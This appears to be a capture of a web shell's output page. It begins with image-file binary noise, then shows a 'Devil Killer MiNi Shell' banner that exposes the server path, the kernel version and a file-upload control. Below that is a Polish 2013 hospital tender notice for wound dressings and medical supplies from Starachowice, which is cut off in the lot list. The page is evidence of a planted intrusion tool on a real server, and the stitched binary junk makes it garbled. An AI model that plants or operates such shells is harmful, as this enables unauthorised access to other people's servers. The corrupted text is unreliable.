JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/260569-N-2013.html

<p class="kh_header"><b>Starachowice: Dostawa materiałów opatrunkowych i innych artykułów medycznych</b><br>
<b>Numer ogłoszenia: 260569 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zakład Opieki Zdrowotnej , ul. Radomska 70, 27-200 Starachowice, woj. świętokrzyskie, tel. 041 2745202 w. 182, faks 041 2746158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zoz.starachowice.sisco.info/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych i innych artykułów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów opatrunkowych i innych artykułów medycznych dla Powiatowego Zakładu Opieki Zdrowotnej z siedzibą w Starachowicach ul. Radomska 70 ujętych w  pakietach określonych ściśle w załączniku nr 5 ofertowym do SIWZ, w ilościach uzależnionych od bieżącego zapotrzebowania wynikającego z działalności leczniczej.
Szczegółowy wykaz produktów zawiera załącznik nr 5 do SIWZ z opisem wymagań minimalnych i ilością przewidywanego zużycia w okresie jednego roku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.16-6, 33.14.00.00-3, 33.62.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana według formuły spełnia - nie spełnia. Wymagane Oświadczenia i dokumenty będą badane pod względem formalnoprawnym, pod względem ich aktualności, a także czy informacje w nich zawarte potwierdzają spełnienie wymagań Zamawiającego. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy lub usługi te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych (min. wartość oferowanej części zamówienia) lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego walidację procesu sterylizacji wyrobów stanowiących przedmiot oferty/zamówienia zgodnie z normą:PN-EN ISO 17665-1:2008(sterylizacja parą wodną w nadciśnieniu) w formie końcowego raportu z walidacji.lub raport ponownej kwalifikacji procesu sterylizacji (operacyjny i procesowy). Dotyczy zakresu przedmiotu zamówienia zawartego w pakiecie nr 8</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zoz.starachowice.sisco.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zakład Opieki Zdrowotnej w Starachowicach ul. Radomska 70 27-200 Starachowice Dział Zamówień Publicznych pok. nr 218..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 11:00, miejsce: Powiatowy Zakład Opieki Zdrowotnej w Starachowicach ul. Radomska 70, 27-200 Starachowice Kancelaria pok. nr 245.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opaski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opaska dziana wiskozowa pakowana pojedynczo 4 m x 10 cm		szt	25000
Opaska dziana wiskozowa pakowana pojedynczo 4 m x 15cm		szt	15000
Opaska elastyczna tkana z zawartością bawełny, z zapinką wielokrotnego użytku, pakowana pojedynczo 4 m x 15 cm		szt	3500
Opaska gipsowa wykonana z gazy min 17 nitkowej szybkowiążąca w czasie 4-6 minut,gips nakładany z obu stron opaski,zawartość gipsu naturalnego min.94%, możliwość obciążenia po 30 minutach 3 m x10 cm, na rolce tekturowej		szt	1500
Opaska gipsowa wykonana z gazy min 17 nitkowej szybkowiążąca w czasie 4-6 minut,gips nakładany z obu stron opaski,zawartość gipsu naturalnego min.94%, możliwość obciążenia po 30 minutach 3 m x(14-15)cm, na rolce tekturowej		szt	3000
Opaska gipsowa wykonana z gazy min 17 nitkowej szybkowiążąca w czasie 4-6 minut,gips nakładany z obu stron opaski,zawartość gipsu naturalnego min.94%, możliwość obciążenia po 30 minutach 3 m x20 cm, na rolce tekturowej		szt	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podkłady pod gips.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkład wyścielający z włókien poliestrowych pod gips 3 m x 10 cm		szt	2000
Podkład wyścielający z włókien poliestrowych pod gips 3 m x 15 cm		szt	2500
Podkład wyścielającyz włókien poliestrowych pod gips 3 m x 20 cm		szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opatrunki różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gaza 17 nitkowa szerokości 90 cm klasa II reguła 7		mb	2000
Gaza 17 nitkowa jałowa 1 m x 1 m sterylizowana parą wodną klasa II reguła 7,tex15		szt	15000
Lignina rolki 150 g		szt	200
Lignina bielona niepyląca arkusze 40 cm x 60 cm (+/- 3 cm)		kg	1600
Wata operacyjna bawełniano - wiskozowa x 500 g (70% bawełny- 30% wiskozy)		op	350
Paski do nieinwazyjnego zamykania małych ran z klejem poliakrylowym  6mm x 76 mm x 3		op	2400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rękawy siatkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatkowy rękaw elastyczny do podtrzymywania opatrunków na ramię i nogę dziecka, w stanie nierozciągniętym szer. 3,5 -4,5 zawartość bawełny min. 50%		mb	500
Siatkowy rękaw elastyczny do podtrzymywania opatrunków w stanie nierozciągniętym szer. 3 cm dł.25 m zawartość bawełny min. 50%		op	500
Siatkowy rękaw elastyczny do podtrzymywania opatrunków na tułów dziecka, głowę, udo, pachę w stanie nierozciągniętym szer. 5 cm dł.25 m zawartość bawełny min. 50%		op	625.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opatrunki specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunek hydrokoloidowy z poliuretanową półprzepuszczalną wodo- i bakterioodporną powłoką osłaniającą, jałowy, zaopatrzony w krawędż samoprzylepną 10 cm x 10 cm		szt	300
Opatrunek hydrokoloidowy z poliuretanową półprzepuszczalną wodo- i bakterioodporną powłoką osłaniającą, jałowy, zaopatrzony w krawędż samoprzylepną 20 cm x 20 cm		szt	100
Opatrunek z włókien alginianów wapnia jałowy 10 cm x 10 cm		szt	150
Opatrunek hydrożelowy, laminowany folią poliuretanową przepuszczalną dla powietrza, nie przepuszczająca cieczy i bakterii, jałowy 10 cm x 10 cm		szt	200
Opatrunek jałowy z siatki bawełnianej z maścią neutralną dla skóry 10 cm x 10 cm		szt	800
Opatrunek z warstwą hydrokoloidową, hydroaktywny, piankowy 10 cm x 10 cm		szt	100
Opatrunek dla ran wymagających aktywnego oczyszczania, do zmiany co 24 h pokryty od zewnątrz wodoodporną warstwą, przed użyciem aktywowany płynem Ringera		szt	70
Opatrunek zawierający srebro w osłonie wykonanej z włókien poliamidowych, impregnowany maścią na bazie tłuszczów obojętnych 10 cm x 10 cm		szt	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kompresy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompresy gazowe jałowe, białe, niepylące, z podwijanymi brzegami sterylizowane parą wodną 8 warstw, 17 nitek 5 cm x 5 cm pakowane po 3 szt, klasa IIA reguła 7 tex 15		op	150000
Kompresy gazowe jałowe, białe, niepylące, z podwijanymi brzegami sterylizowane parą wodną 8 warstw, 17 nitek 7,5 cm x 7,5 cm pakowane po 3 szt, klasa IIA reguła 7 tex 15		op	140000
Kompresy gazowe jałowe, białe, niepylące, z podwijanymi brzegami sterylizowane parą wodną 8 warstw, 17 nitek 10 cm x 10 cm pakowane po 3 szt, klasa IIA reguła 7 tex 15		op	80000
Kompresy gazowe niejałowe białe, niepylące 16 warstw 17 nitek 5 cm x 5 cm x 100 szt, klasa IIA reguła 7 tex 15		op	2000
Kompresy gazowe niejałowe białe, niepylące 16 warstw 17 nitek 7,5 cm x 7,5 cm x 100 szt, klasa IIA reguła 7 tex 15		op	1300
Kompresy gazowe niejałowe białe, niepylące 16 warstw 17 nitek 10 cm x 10 cm x 100 szt, klasa IIA reguła 7 tex 15		op	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Tampony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tampony z gazy 20 nitkowej o wymiarach 24x24 cm, kula średnicy 30 mm niejałowe		szt	20000.</p></li>
